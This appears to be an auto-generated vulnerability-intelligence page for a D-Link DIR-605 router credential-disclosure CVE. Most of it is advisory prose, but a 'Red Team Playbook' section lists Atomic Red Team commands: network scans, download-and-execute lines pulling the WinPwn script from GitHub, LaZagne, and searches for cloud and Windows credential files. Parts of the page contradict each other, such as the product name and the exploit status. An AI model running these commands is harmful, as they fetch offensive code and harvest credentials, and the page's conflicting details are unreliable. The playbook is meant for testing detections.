CVE-2021-40655
Overview
This vulnerability is an information disclosure flaw resulting from improper access control in the firmware of the D-LINK DIR-605 B2 device, version 2.01MT. The root cause lies in the unauthenticated access to the /getcfg.php endpoint, which processes POST requests without verifying the legitimacy of the requester. This allows unauthorized interaction with a configuration interface that exposes sensitive credential data stored within the router firmware.
Vulnerability Description
An informtion disclosure issue exists in D-LINK-DIR-605 B2 Firmware Version : 2.01MT. An attacker can obtain a user name and password by forging a post request to the / getcfg.php page
Impact
An unauthenticated attacker can retrieve router administrator credentials, including usernames and passwords, by exploiting this vulnerability. No prior access or user interaction is required, enabling remote attackers to obtain sensitive authentication data. This exposure can lead to unauthorized administrative access to the router, compromising network security, enabling further attacks such as network traffic interception, configuration manipulation, or lateral movement within the affected environment.
Solution
D-Link has published security bulletins addressing this issue for the DIR-605 B2 model. Users should upgrade the firmware to a version later than 2.01MT as provided on the official D-Link security bulletin page (https://www.dlink.com/en/security-bulletin/). Applying the vendor-released firmware update is the primary remediation step to eliminate unauthorized access to the /getcfg.php endpoint and protect router credentials from disclosure.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the D-Link DIR-605 B2 firmware presents a significant information disclosure risk due to improper handling of user authentication data. Specifically, the flaw resides in the handling of POST requests to the /getcfg.php endpoint, which allows an attacker to forge requests and retrieve sensitive information, including usernames and passwords. This issue arises from inadequate validation of input data, enabling unauthorized access to configuration settings that should be protected. The lack of robust security measures in the firmware exposes the device to potential exploitation, particularly in environments where default credentials or weak passwords are utilized.
Attack vectors for this vulnerability are relatively straightforward, as they primarily involve sending crafted POST requests to the vulnerable endpoint. An attacker could leverage tools such as cURL or custom scripts to automate the process of sending these requests, potentially targeting multiple devices in a network. Exploitation scenarios could range from a remote attacker attempting to gain access to a single device to a more sophisticated adversary targeting multiple devices within a corporate network. Once the attacker successfully retrieves the credentials, they could gain unauthorized access to the router's administrative interface, allowing them to manipulate network settings, intercept traffic, or launch further attacks against connected devices.
The real-world impact of this vulnerability can be profound, particularly for organizations relying on the affected router model for their network infrastructure. Unauthorized access to a router can lead to a range of business risks, including data breaches, loss of sensitive information, and compromised network integrity. For instance, if an attacker gains access to the router, they could redirect traffic to malicious sites, conduct man-in-the-middle attacks, or even deploy malware across the network. The potential for reputational damage and regulatory penalties further underscores the importance of addressing such vulnerabilities promptly, as organizations may face legal repercussions if customer data is compromised due to negligence in securing their network devices.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating firmware to the latest versions provided by the manufacturer is crucial, as updates often include patches for known vulnerabilities. Additionally, network administrators should conduct routine security assessments and penetration testing to identify and remediate weaknesses in their network devices. Employing intrusion detection systems (IDS) can help monitor for unusual traffic patterns indicative of exploitation attempts. Furthermore, enforcing strong password policies and disabling remote management features when not needed can significantly reduce the attack surface, making it more challenging for adversaries to exploit vulnerabilities in the firmware.
In conclusion, the information disclosure vulnerability in the D-Link DIR-605 B2 firmware poses a serious threat to both individual users and organizations. By understanding the technical details, potential attack vectors, and real-world implications, cybersecurity professionals can better prepare to defend against such threats. Implementing effective detection and mitigation strategies is essential to safeguarding network infrastructure and protecting sensitive data from unauthorized access. As the threat landscape continues to evolve, proactive measures and a commitment to security best practices will be vital in maintaining the integrity of network devices and the information they handle.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2021-40655, with new telemetry indicating the initial emergence of exploitation attempts targeting the D-Link DIR-605 router vulnerability. Although the EPSS score has slightly decreased, reflecting a modest reduction in overall exploit probability, the presence of fresh detection signals underscores that threat actors remain interested in leveraging this information disclosure flaw. This development is significant as it signals a potential shift from theoretical risk to active reconnaissance or exploitation phases, increasing the urgency for defenders to monitor network traffic for anomalous POST requests to the vulnerable endpoint. While no new exploit variants or ransomware associations have been identified, the uptick in detection activity suggests that adversaries may be probing for accessible targets, which could lead to credential compromise and subsequent lateral movement within affected environments. Consequently, the threat level should be considered elevated from dormant to active, warranting heightened vigilance despite the absence of confirmed widespread exploitation campaigns.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Dir-605l Firmware | 2.01mt |
cpe:2.3:o:dlink:dir-605l_firmware:2.01mt:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-40655 |
| dlink.com |
GitHub CVE
x_refsource_MISC
|
https://www.dlink.com/en/security-bulletin/ |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/Ilovewomen/D-LINK-DIR-605/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-40655 |